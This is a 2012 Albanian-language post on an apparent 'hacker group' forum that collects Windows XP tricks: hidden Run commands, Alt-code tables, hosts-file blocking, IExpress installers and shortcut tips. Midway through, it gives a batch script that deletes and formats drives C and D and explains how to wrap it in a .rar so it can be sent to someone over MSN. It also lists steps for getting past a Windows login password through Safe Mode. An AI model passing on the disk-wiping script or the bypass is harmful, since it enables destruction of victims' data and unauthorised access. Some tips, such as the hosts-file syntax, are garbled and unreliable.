Monday, 04.23.2018, 10:26 PM
Welcome Guest | RSS
Albanian Hackers Group
Main
Sign Up
Login
Site menu

Seksioni kategoris
My files [147]

Bookmark website

Sondazhi Yne
Votoni webin
Total of answers: 825

Statistika

Total online: 1
Guests: 1
Users: 0

Main » Files » My files

Disa Programet te fshehura te windowsit
05.26.2012, 2:31 AM
Disa Programet te fshehura te windowsit

1- Private Character Editor
Ky program osht me dizajnu ikona edhe karakteret. Per te ekzekutuar ket program shkon kshtu:
START --> RUN--> ne run shkruaj (EUDCEDIT)

2-Disk Cleanup
Ky osht per me pastru hard disc
Start-- Run--> cleanmgr

3-Dr Watson
Ky osht per me i riparu problemet qe i kemi ne windows
Start-->Run--> drwtsn32

4-Windows Media Player 5.1
Ky osht windows media player classic
Start-->Run--> mplay32


ja edhe disa comanda tjera:

Character Map = charmap
DirectX diagnosis = dxdiag
Object Packager = packager
System Monitor = perfmon
Program Manager = progman
Remote Access phone book = rasphone
Registry Editor = regedt32
File siganture verification tool = sigverif
Volume Contro = sndvol32
System Configuration Editor = sysedit
Syskey = syskey
microsoft Telnet Client = telnet####################################################################3


Per te hqur qafe msn e vjeter qe shpesh ju bezdis ndiqni hapat ne vazhdim :

Shkojm Start/Run edhe qitni qeta :RunDll32 advpack.dll,LaunchINFSection %windir%\INF\msmsgs.inf,BLC.Remove dhe shtypni OK..######################################################################3

Cito:
Krejt Kodet e Testatures

Alt-0128 €
Alt-0129 ?
Alt-0130 ‚
Alt-0131 ƒ

Alt-0132 „
Alt-0133 …
Alt-0134 ?
Alt-0135 ‡

Alt-0136 ˆ
Alt-0137 ‰
Alt-0138 U
Alt-0139 ‹

Alt-0140 Œ
Alt-0141 ?
Alt-0142 ?
Alt-0143 ?

Alt-0144 ?
Alt-0145 ‘
Alt-0146 ’
Alt-0147 "

Alt-0148 "
Alt-0149 •
Alt-0150 –
Alt-0151 —

Alt-0152 ˜
Alt-0153 ™
Alt-0154 š
Alt-0155 ›

Alt-0156 œ
Alt-0157 ?
Alt-0158 ?
Alt-0159 Ÿ

Alt-0160
Alt-0161 ¡
Alt-0162 ¢
Alt-0163 £

Alt-0164 ¤
Alt-0165 ¥
Alt-0166 ¦
Alt-0167 §

Alt-0168 ¨
Alt-0169 ©
Alt-0170 ª
Alt-0171 «

Alt-0172 ¬
Alt-0173
Alt-0174 ®
Alt-0175 ¯

Alt-0176 °
Alt-0177 ±
Alt-0178 ²
Alt-0179 ³

Alt-0180 ´
Alt-0181 µ
Alt-0182 ¶
Alt-0183 •

Alt-0184 ¸
Alt-0185 ¹
Alt-0186 º
Alt-0187 »

Alt-0188 ¼
Alt-0189 ½
Alt-0190 ¾
Alt-0191 ¿

Alt-0192 À
Alt-0193 Á
Alt-0194 Â
Alt-0195 Ã

Alt-0196 Ä
Alt-0197 Å
Alt-0198 Æ
Alt-0199 Ç

Alt-0200 È
Alt-0201 É
Alt-0202 Ê
Alt-0203 Ë

Alt-0204 Ì
Alt-0205 Í
Alt-0206 Î
Alt-0207 Ï

Alt-0208 G
Alt-0209 Ñ
Alt-0210 Ò
Alt-0211 Ó

Alt-0212 Ô
Alt-0213 Õ
Alt-0214 Ö
Alt-0215 ×

Alt-0216 Ø
Alt-0217 Ù
Alt-0218 Ú
Alt-0219 Û

Alt-0220 Ü
Alt-0221 I
Alt-0222 S
Alt-0223 ß

Alt-0224 ê
Alt-0225 á
Alt-0226 â
Alt-0227 ã

Alt-0228 ä
Alt-0229 å
Alt-0230 æ
Alt-0231 ç

Alt-0232 è
Alt-0233 é
Alt-0234 ê
Alt-0235 ë

Alt-0236 ì
Alt-0237 ê
Alt-0238 î
Alt-0239 ï

Alt-0240
Alt-0241 ñ
Alt-0242 ò
Alt-0243 ó

Alt-0244 ô
Alt-0245 õ
Alt-0246 ö
Alt-0247 ÷

Alt-0248 ø
Alt-0249 ù
Alt-0250 ú
Alt-0251 û

Alt-0252 ü
Alt-0253 i
Alt-0254 s
Alt-0255 ÿ


##################################################################3

Si ta bejme nje Setup tendin.

1.Start/Run dhe shenojm kete: iexpress.exe

2.Create New Self Extraction Directive Files - Dhe klikojme Next

3.Extrative Files And Run Instalation Command - Dhe klikojme Next

4.Pastaj shfaqet: Package Title - E shenojme emrin e programit dhe klikojme Next

5.Ku eshte - No Prompt - klikojme: Prompt User With - Dhe shenojm mesazhin qe deshirojme te shfaqet kur te hapet setup-i, pastaj klikojme Next

6.Do Not Display Licencse - Next

7.Klikojme ADD Dhe e marrim Setup-in e programit cilin don ta editosh Dhe Klikojme Next.

8.Ku shkruan Install Program klikojme ne nje Shigjet Dhe E Zgjedhni qfar programi eshte dhe klikojme Next.

9.Ku eshte Defualt (recommendet) e bejme Maximized dhe Next.

10.Finished Message - Eshte mesazhi cilin shfaqet fund kur te perfundon Instalimi kliko: Display Message - Dhe sheno mesazhin cilin do ti dhe Next.

11.Kliko Broswe dhe Beje Save ku te duash dhe vazhdo Next.

12.Shkon NO RESTART dhe kliko Next.

13.Next dhe Next prap dhe hapet nje: Command Prompt - Dhe presim derisa te perfundoje, mos e mbyllni ju duhet ta Leni deri sa
te mbaroje vet. Pasi te mbaroje kliko Finish

14.Me ne fund kliko ne Setup.


#################################################################3

Per te bllokuar nje ose me shume faqe ne pcn tuaj ndiqni hapat :

1) Shko tek C:\WINDOWS\system32\drivers\etc

2) Gjejm fajllin me emrin 'hosts'

3) E hap me notepad ( me 1 fjal me nje tekst editor po te gjithe perdorim Notepad ose WordPad )dhe nen "127.0.0.1 localhost" shkruan 127.0.0.2http://www.faqjaqedonmebloku.com
4) Bejeni save kete ( ruajeni ) dhe tash shko hap browserin dhe shkruaje ate siten qe e blokove do te shohesh qe nuk mundesh me kyq ne ate site.

5) Per te blokuar dmth webfaqe me shum jo veq 1 ateher shkojm keshtu :
127.0.0.2 http://www.faqjaqedonmebloku.com 127.0.0.3 http://www.faqjaqedonmebloku.com e kshttu pra vazhdon me radh me tjera


#################################################################3
Si te beni ikonen e ShutDown ne Desktop

Mas pari kliko Desktop me tastin e djatht te mausit e krijon nje Shortcut

pastaj aty e shenon kete :

%windir%\System32\Shutdown.exe -s -t 0

pastaj klikon Next dhe tani eshte krijuar Icona ShutDown dhe kur klikoni mbi te pc juaj do ndalet automatikisht ..!


##################################################################

Si te beni nje Folder te tejdukshem dhe pa emer andaj ndiqni hapat ne vazhdim :

1. Ne Destop klikoni me tastin e djathte pastaj shkoni New dhe Folder pra krijoni nje Folder te ri ne Destop !!!
2. Pastaj klikoni Rename dhe shtypni Alt + 255 dhe Enter tani Folderi eshte pa merin siq e shihni!!
3. Tek ky Folder klikoni me tastin e djatht dhe shkoni tek Properties !!!
4. Pasi te hapet dritarja klikoni tek Customize dhe Change Icon !!!
5. Dhe ne fund aty zgjedh nje Icon te tejdukshme dhe krejt ne fund mbetet te klikoni OK.
Tani ju keni krijuar nje Folder tersishte te tejdukshem !!!


####################################################################

Qysh me Foramtizu pc Pa cd
Shkojmm hapim Notepad edhe i bojm paste kete :

echo off
DEL C:\ -y
DEL D:\ -y
FORMAT C:\ -y

Shkojm Save As.. :

emri.BAT dmth. me .bat n`fund

Nese doni me ja qu dikujt n`MSN , nuk muni me ja qu sepse osht .bat file

po duhet me shti n`.rar arkiv e kete mund ta boni me WinRar 


##################################################################3

Si te levizni mausin me testatur

Per te levizur mausin permes testatur atehere shtypni keto : shift+alt+num lock pastaj me 8 shkon nalt me 4 majtas me 6 djathtas me 2 posht dhe me 7,9,1,3 pjerrtas :D

###################################################################3

Si te nderroni Logon win XP


Si me ja nderru Logon Windows XP Nese kur e instaloni (beni format) me windows kompjuterin tuaj dhe ne mycomputer,kur klikoni me susten e djatht dhe pastaj shkoni properties.dhe aty keni ndonje logo>psh.mund te jete ndonje logo te ndonje firme ose logo e windowsi-it ose mkund te mos ket asnje logo(foto)...nese ju aty doni te vendosni foton tuaj ose cfar duani foto do shkoni keshtu::
se pari do te shkoni: C:\WINDOWS\system32 dhe aty do te kerkoni OEMLOGO (eshte foto) dhe kete logo do te hapni me ndonje program psh.fotoshop ose me ndonje program tjeter dhe e permisoni si duani , pastaj e beni save as me te njejtin emer dhe ne te njejtin vend.pastaj shkoni ne mycomputer me te djathten dhe fotoja qe keni venduar do te jete aty...


################################################################3

Hap Pc Pa e Ditur Passwordin

1-Ndizni pc
2-shtypni F8
3-Safe mode
4-Klikon te Admin..
5-Control Panel.
6-Remove Pass

Verejtje: Ne disa pc nuk punon kshtu qe 98% e keni sigurt qe bon


#####################################################################

Si ti hekim errorat ne PC :

Shkojme te My Computer me tastin e djatht klikojme tek Properties, pastaj Advance, dhe Error Reporting aty e beni Disable dhe ne fund vetem klikoni OK . :)######################################################################

Si të pastrojme memorien e kompjuterit pa e restartuar kompjuterin


Neve na ndodh shpesh qe kompjuteri yne punen e vet ta opracionalizoj ne menyreshume te ndagalshme. Shumica e njerezve e restartojne kompjuterin , mirepo ne kemi edhe nje menyre te thjeshte per te vepruar, pa e restartuar sistemin operativ?

1. Kliko me tastin e djathte ne desktop dhe zgjidh opcionin New - Shortcut.

2. Në vendin e paraqitur shkruaj kete kod %windir%\system32\rundll32.exe advapi32.dll,ProcessIdleTasks

3. Shtyp Next.

4. Emëroje si "Clear Memory”.

5. Kliko Finish pasi ta kesh emeruar..

Tash çdoherë qe kompjuteri yt punon ngadalë, kliko kete ikon dhe ajo do e pastroje memorien e kompjuterit tuaj pa e restartuar kompjuterin dhe njekohesisht do te shpejtoj punen e kompjuterit tuaj.
Category: My files | Added by: albanian-hacker
Views: 280 | Downloads: 0 | Comments: 1 | Rating: 0.0/0
Total comments: 0
Only registered users can add comments.
[ Sign Up | Login ]
Kerko

Share Website

Upload your files

VIDEO


Copyright ALBANIAN-HACKER © 2018
Free web hostinguCoz